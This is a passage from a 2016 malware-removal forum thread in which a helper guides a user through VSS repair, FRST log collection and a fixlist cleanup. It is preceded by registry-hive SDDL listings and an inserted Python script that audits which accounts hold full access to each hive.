"\\?\C:\Users\LogMeInRemoteUser\AppData\Local\Microsoft\Windows\UsrClass.dat.old",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1003)"
"\\?\C:\Users\LogMeInRemoteUser\ntuser.dat",1,"O:BAG:S-1-5-21-56867686-1103405722-4171089578-513D:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1003)"
"\\?\C:\Users\LogMeInRemoteUser\ntuser.dat.old",1,"O:BAG:S-1-5-21-56867686-1103405722-4171089578-513D:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1003)"
"\\?\C:\WINDOWS\ServiceProfiles\LocalService\ntuser.dat",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LS)"
"\\?\C:\WINDOWS\ServiceProfiles\LocalService\ntuser.dat.old",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LS)"
"\\?\C:\WINDOWS\ServiceProfiles\NetworkService\ntuser.dat",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;NS)"
"\\?\C:\WINDOWS\ServiceProfiles\NetworkService\ntuser.dat.old",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;NS)"
"\\?\C:\WINDOWS\System32\Config\components",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\WINDOWS\System32\Config\components.old",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\WINDOWS\System32\Config\default",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\default.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\drivers",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\WINDOWS\System32\Config\drivers.old",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\WINDOWS\System32\Config\sam",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\sam.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\security",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\security.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\software",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\software.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\system",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"\\?\C:\WINDOWS\System32\Config\system.old",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
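
The rows above, from the Tweaking.com Registry Backup sddl listing, are Windows security descriptors in SDDL form: owner (O:), primary group (G:), then the DACL as a chain of ACEs, each (type;flags;rights;;;trustee). As an added example, not part of this thread or of any of the tools it mentions, here is a small Python parser that reads that CSV-style listing, decodes every ACE, lists who holds full access (FA) on each hive file, and reports per-user hives on which more than one account SID (S-1-5-21-...) holds full access; in the listing above the "Greg Main Acct" hives grant FA to both the -1004 and -1000 SIDs. The sample rows are copied from the listing; the function names, the well-known-SID table and the "shared hive" heuristic are my own assumptions, and a hit is something for the responder to review, not a verdict.

```python
"""Added example: parse SDDL rows from a registry-hive backup listing and
summarise which principals hold full access on each hive file."""
import csv
import io
import re
from dataclasses import dataclass, field

# Sample rows copied from the sddl listing in this thread, plus the "SDDL"
# header line the tool writes; constructed input for this example only.
SAMPLE_LISTING = r"""SDDL
"\\?\C:\Users\Greg Main Acct\ntuser.dat",1,"O:S-1-5-21-56867686-1103405722-4171089578-1004G:S-1-5-21-56867686-1103405722-4171089578-513D:AIAR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1004)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\Greg\ntuser.dat",1,"O:S-1-5-21-56867686-1103405722-4171089578-1000G:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1000)"
"\\?\C:\Users\LogMeInRemoteUser\ntuser.dat",1,"O:BAG:S-1-5-21-56867686-1103405722-4171089578-513D:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-56867686-1103405722-4171089578-1003)"
"\\?\C:\WINDOWS\ServiceProfiles\LocalService\ntuser.dat",1,"O:BAG:SYD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;LS)"
"\\?\C:\WINDOWS\System32\Config\components",1,"O:BAG:BAD:AR(A;;FA;;;BA)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;0x1200a9;;;BU)"
"\\?\C:\WINDOWS\System32\Config\sam",1,"O:BAG:BAD:AR(A;ID;FA;;;SY)(A;ID;FA;;;BA)"
"""

# Well-known SDDL trustee abbreviations that occur in the listing.
WELL_KNOWN = {
    "SY": "NT AUTHORITY\\SYSTEM",
    "BA": "BUILTIN\\Administrators",
    "BU": "BUILTIN\\Users",
    "LS": "NT AUTHORITY\\LOCAL SERVICE",
    "NS": "NT AUTHORITY\\NETWORK SERVICE",
}
# Hive file names that belong to one user profile (assumption for the heuristic).
PER_USER_HIVES = ("ntuser.dat", "ntuser.dat.old", "usrclass.dat", "usrclass.dat.old")

SD_RE = re.compile(r"^O:(?P<owner>[^:]+?)G:(?P<group>[^:]+?)D:(?P<dacl>.*)$")
ACE_RE = re.compile(r"\(([^)]*)\)")


@dataclass
class Ace:
    ace_type: str  # "A" = access allowed, "D" = access denied
    flags: str     # e.g. "ID" = inherited from the parent object
    rights: str    # "FA" = full access, otherwise a hex access mask such as 0x1200a9
    sid: str       # abbreviation (SY, BA, ...) or a full S-1-5-... SID


@dataclass
class HiveAcl:
    path: str
    owner: str
    group: str
    dacl_flags: str              # DACL control flags, e.g. "AR" or "AIAR"
    aces: list[Ace] = field(default_factory=list)


def parse_sddl(sddl: str) -> tuple[str, str, str, list[Ace]]:
    """Split an SDDL string into owner, group, DACL flags and its ACEs."""
    m = SD_RE.match(sddl)
    if not m:
        raise ValueError(f"unrecognised SDDL: {sddl!r}")
    dacl = m.group("dacl")
    first = dacl.find("(")
    dacl_flags = dacl if first < 0 else dacl[:first]
    aces = []
    for body in ACE_RE.findall(dacl):
        parts = body.split(";")
        if len(parts) != 6:
            raise ValueError(f"unrecognised ACE: ({body})")
        ace_type, flags, rights, _object_guid, _inherit_guid, sid = parts
        aces.append(Ace(ace_type, flags, rights, sid))
    return m.group("owner"), m.group("group"), dacl_flags, aces


def parse_listing(text: str) -> list[HiveAcl]:
    """Read the tool's CSV-style rows (path, flag, SDDL); skip headers and blanks."""
    hives = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) != 3:
            continue
        path, _flag, sddl = row
        owner, group, dacl_flags, aces = parse_sddl(sddl)
        hives.append(HiveAcl(path, owner, group, dacl_flags, aces))
    return hives


def describe(sid: str) -> str:
    """Expand a well-known abbreviation; full SIDs are returned unchanged."""
    return WELL_KNOWN.get(sid, sid)


def full_access_names(h: HiveAcl) -> list[str]:
    """Principals granted full access on the hive, in ACE order, deduplicated."""
    names: list[str] = []
    for a in h.aces:
        if a.ace_type == "A" and a.rights == "FA" and describe(a.sid) not in names:
            names.append(describe(a.sid))
    return names


def shared_user_hives(hives: list[HiveAcl]) -> dict[str, list[str]]:
    """Per-user hives on which more than one account SID holds full access.
    A per-user hive is normally reachable only by SYSTEM, Administrators and
    the profile's own account, so a second account SID is worth a look."""
    out: dict[str, list[str]] = {}
    for h in hives:
        if not h.path.lower().endswith(PER_USER_HIVES):
            continue
        sids = sorted({a.sid for a in h.aces
                       if a.ace_type == "A" and a.rights == "FA"
                       and a.sid.startswith("S-1-5-21-")})
        if len(sids) > 1:
            out[h.path] = sids
    return out


if __name__ == "__main__":
    hives = parse_listing(SAMPLE_LISTING)
    for h in hives:
        print(f"{h.path}\n  owner={describe(h.owner)} dacl={h.dacl_flags} "
              f"full_access={full_access_names(h)}")
    for path, sids in shared_user_hives(hives).items():
        print(f"REVIEW: {path} grants full access to more than one account: {sids}")
```

Point the script at the whole sddl.txt (read the file instead of SAMPLE_LISTING) to get the same summary for every hive; ACEs whose rights are a hex mask rather than FA, such as the 0x1200a9 (read and execute) entry for BUILTIN\Users on the components hive, are parsed but are not counted as full access.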
 
 
 


#8 nasdaq

nasdaq

  • Malware Response Team
  • 38,936 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 11 August 2016 - 07:06 AM

Your system repair is corrupted.
This program will recreate the correct registry setting and re-register all VSS components. Please download one of the below programs to fix your problem:

Operating system 32 or 64 bit.

VSSfix 32bit
http://updates.macrium.com/reflect/utilities/vssfix.exe

VSSfix 64bit
http://updates.macrium.com/reflect/utilities/vssfixx64.exe

You can right click the exe file and run as Administrator in normal mode and see if that solves the problem. If not try running in Safe Mode.

When completed run the Farbar tool and post both logs for my review.

Do not run the Tweaking tool just yet.

#9 Gregbc1976

Gregbc1976
  • Topic Starter

  • Members
  • 19 posts

Posted 11 August 2016 - 08:42 AM

Ran vssfixx64; it completed without any messages or logs that I could determine.

 

Ran FRST forgot to run as admin it created a fixlog.txt see attached. I did not run a scan.

 

Ran FRST again and scanned as administrator, see attached FRST.txt

 

Attached File  Fixlog.txt   13.89KB   1 downloads

 

Attached File  FRST.txt   43.68KB   1 downloads



#10 nasdaq

nasdaq

  • Malware Response Team
  • 38,936 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 11 August 2016 - 10:08 AM

Please run the Farbar tool one more time.
Ensure that the Box to create an Addition.txt file is checked.

Paste the fresh Addition.txt file for my review.

#11 Gregbc1976

Gregbc1976
  • Topic Starter

  • Members
  • 19 posts

Posted 11 August 2016 - 01:04 PM

Once again thanks for your help

see attached files (I also included the fresh FRST.txt)

 

Attached File  FRST.txt   43.08KB   1 downloads

 

Attached File  Addition.txt   54.52KB   1 downloads



#12 nasdaq

nasdaq

  • Malware Response Team
  • 38,936 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 12 August 2016 - 08:01 AM

Before you proceed with this fix delete the current Fixlist.txt that you previously created.

Spybot and Destroy may be protecting the registry.
Therefore I strongly suggest you remove it via the Control Panel > Programs > Programs and Features.

Restart the computer to reset the registry.

===


Press the Windows key + R on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK key.
Please copy the entire contents of the code box below to a new file.
 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

HKLM-x32\...\Run: [] => [X]
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
GroupPolicyScripts-x32: Restriction <======= ATTENTION
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No File
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\avg-secure-search.xml [2014-08-26]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA} [2011-01-24] [not signed]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2012-06-14] [not signed]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2016-06-10]
CHR HKLM-x32\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - <no Path/update_url>
U3 idsvc; no ImagePath
U3 wpcsvc; no ImagePath
C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA}
C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA}
Task: {2CD25754-13AA-4775-B30F-F0607745C1F6} - \Microsoft\Windows\Setup\GWXTriggers\Logon-URT -> No File <==== ATTENTION
Task: {51C1E536-747F-4B34-840F-D0914E0355F5} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {5B16E285-B289-421B-99E7-A12B163EE510} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {5D3F78A7-82CA-4FAD-90E0-89D7AC31A69C} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {6A7B26ED-20DF-4D37-B1DD-5BE116E84B90} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {76A4380F-3D18-49F7-91FA-E28BA06D8AE8} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {928CFA40-274E-4744-AE9D-B6368CD25CFF} - \Microsoft\Windows Defender\MP Scheduled Scan -> No File <==== ATTENTION
Task: {D1D0EB61-0014-47B5-8382-2F0E44CF7A8E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {D1E3F3E1-731E-45E4-86AD-ABAF3DAAA5F9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {E499F8F0-A04A-47B8-8BAC-E498442C0399} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {E94FE054-1715-4313-8BF0-E7CD02F28C77} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {EF109252-8D17-40B7-9D01-75B7341DA22A} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {F3502C3B-DF07-4A3F-A123-D2D20CF4E814} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {F76C1D00-C776-4D7F-9828-7B4ADC39D3EB} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

Restart the computer normally to reset the registry.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Not sure if your Restore points have been repaired.
The Addition.txt file reports that the last one was on
09-08-2016 12:19:50 Windows Update

I will keep an eye on the Fixlog.txt file that will be created with this fix.
It should indicate if a restore point was created or not.

Run this fix and let me know what problem persists.

#13 Gregbc1976

Gregbc1976
  • Topic Starter

  • Members
  • 19 posts

Posted 12 August 2016 - 08:42 AM

Removed Spybot, rebooted. 

Ran FRST Fix it automatically rebooted.

 

Microphone is still OK

 

Start (left button click) and Windows key do not respond (shows the little blue circle as if a program is loading/running), then nothing

EDGE icon still missing 

IE seems to be performing much better after initial page that gives "a long running script" error

 

Attached File  Fixlog.txt   11.98KB   1 downloads

 

 



#14 nasdaq

nasdaq

  • Malware Response Team
  • 38,936 posts
  • Gender:Male
  • Location:Montreal, QC. Canada

Posted 12 August 2016 - 10:29 AM

The good news is that a restore point was created.

Try to run the Tweaking tool script now that Spybot has been removed.

Post the log if you are successful.

#15 Gregbc1976

Gregbc1976
  • Topic Starter

  • Members
  • 19 posts

Posted 12 August 2016 - 01:32 PM

Step 5 had an error see attached word document

Also attaching log files from the attempted backup

 

Attached File  Tweaking Error 8-12-16.doc   27.5KB   3 downloads

 

Attached File  backup_info.txt   216bytes   1 downloads

 

Attached File  Log_Backup.txt   27.93KB   1 downloads

 

Attached File  sddl.txt   10.77KB   2 downloads

 

I did NOT run the Repair step yet

 

 





